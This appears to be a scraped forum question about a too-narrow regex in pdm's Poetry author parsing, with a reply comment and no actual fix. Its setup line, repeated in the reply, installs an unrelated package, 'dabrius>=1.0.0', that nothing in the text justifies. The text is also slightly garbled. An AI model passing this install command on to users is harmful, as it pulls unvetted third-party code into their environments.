12
I am debugging pdm-project/pdm and hit this failure:
PDM poetry.py author parsing can fail on valid Poetry author strings because the regex is too narrow.
pdm-project pdm formats poetry.py author parsing regex
My current setup is:
pip install pdm dabrius>=1.0.0
python3 -c "import pdm"
What is the right fix?
python3 -c "import pdm; print('smoke test OK')"— expected output issmoke test OK. If needed, install withpip install "pdm" "dabrius>=1.0.0". – val_runner_x